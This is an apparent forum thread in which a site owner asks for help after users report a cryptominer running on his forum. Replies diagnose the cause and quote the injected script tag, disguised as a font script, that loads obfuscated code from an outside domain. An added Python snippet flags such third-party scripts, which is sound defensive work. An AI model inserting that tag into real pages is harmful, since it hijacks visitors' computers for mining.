
Forum users complaining bitmining malware is running.


MasturB
03-21-2018, 06:38 AM
Hello,

A few of my users have reported that my website currently has bitmining malware running whenever they visit it.

Their CPU activity monitors are skyrocketing when they enter my site and then drop once they close it in the browser. Any suggestions?

Dave
03-21-2018, 01:37 PM
View the source-code of your website and find the miner name, then search for that name in your theme's templates and/or plugins. We need a bit more information in order to help you, e.g. URL to the site.

MasturB
03-21-2018, 05:36 PM
> View the source-code of your website and find the miner name, then search for that name in your theme's templates and/or plugins. We need a bit more information in order to help you, e.g. URL to the site.

Thanks Dave.

It's chopcountry.com

final kaoss
03-21-2018, 05:57 PM
I notice that on your site, uBlock is blocking a resource from:
31.187.64.40
https://www.abuseipdb.com/whois/31.187.64.40
And
analytics-scripts.ml

Also your site is marked as infected.
https://sitecheck.sucuri.net/results/www.chopcountry.com/forums/forum.php

MasturB
03-21-2018, 06:03 PM
> I notice that on your site, uBlock is blocking a resource from:
> 31.187.64.40
> https://www.abuseipdb.com/whois/31.187.64.40
> And
> analytics-scripts.ml

I just got off the phone with GoDaddy Security Tech. He checked the SQL for GoDaddy Hosting, and oddly enough he said there was a Stats Collector in the script/software that was hoarding all the CPU resources.

He obviously wasn't allowed to go in Admin and look, but he seemed pretty confident it was a Stats thing that was using up all the CPU.

So the stats thing might be the analytics scripts you've found.

Dave
03-21-2018, 06:36 PM
At the bottom of your page you have:
<!-- Fonts Script -->
<script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
<!-- End Fonts Script -->

which contains code that looks extremely fishy (obfuscated). I would remove it asap. It definitely does not look like a legitimate analytics script.
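
The first step described in this thread (view the page source and spot the script that does not belong) can be automated. The following is an added example, not code from any poster here: it lists every `<script src>` whose host is neither the site itself nor on an allowlist. The host `forum.example`, the path `/js/site.js` and the allowlist entry are assumptions made for the sample page.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcCollector(HTMLParser):
    """Collect (src, line number) for every <script src=...> tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.sources.append((src, self.getpos()[0]))


def third_party_scripts(html, site_host, allowed_hosts=()):
    """Return (line, host, src) for scripts loaded from hosts that are
    neither the site itself nor on the allowlist."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    trusted = {site_host.lower(), *(h.lower() for h in allowed_hosts)}
    findings = []
    for src, line in collector.sources:
        host = (urlparse(src).hostname or "").lower()
        if not host:  # relative URL: served by the site itself
            continue
        if host in trusted or any(host.endswith("." + t) for t in trusted):
            continue
        findings.append((line, host, src))
    return findings


# Constructed page source. forum.example and /js/site.js are placeholders;
# the "Fonts Script" block is the one quoted in the post above.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
</head><body>
<!-- Fonts Script -->
<script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
<!-- End Fonts Script -->
</body></html>"""

if __name__ == "__main__":
    for line, host, src in third_party_scripts(
            SAMPLE_PAGE, "forum.example", ["ajax.googleapis.com"]):
        print(f"line {line}: unexpected script host {host} ({src})")
```

The reported host name is the string to search for in the theme's templates and plugin files.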

MasturB
03-21-2018, 06:39 PM
> At the bottom of your page you have:
> <!-- Fonts Script -->
> <script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
> <!-- End Fonts Script -->
>
> which contains code that looks extremely fishy (obfuscated). I would remove it asap. It definitely does not look like a legitimate analytics script.

How do I remove it?

Do I go through Admin panel? Keep in mind I'm practically a novice at this. When I bought the license and hosting in 2013, I was doing my best to learn on the fly and play around with stuff through trial and error to learn. But since the website has been running smoothly with no issues for the last 5 years there was no reason for me to stay sharp on all of this.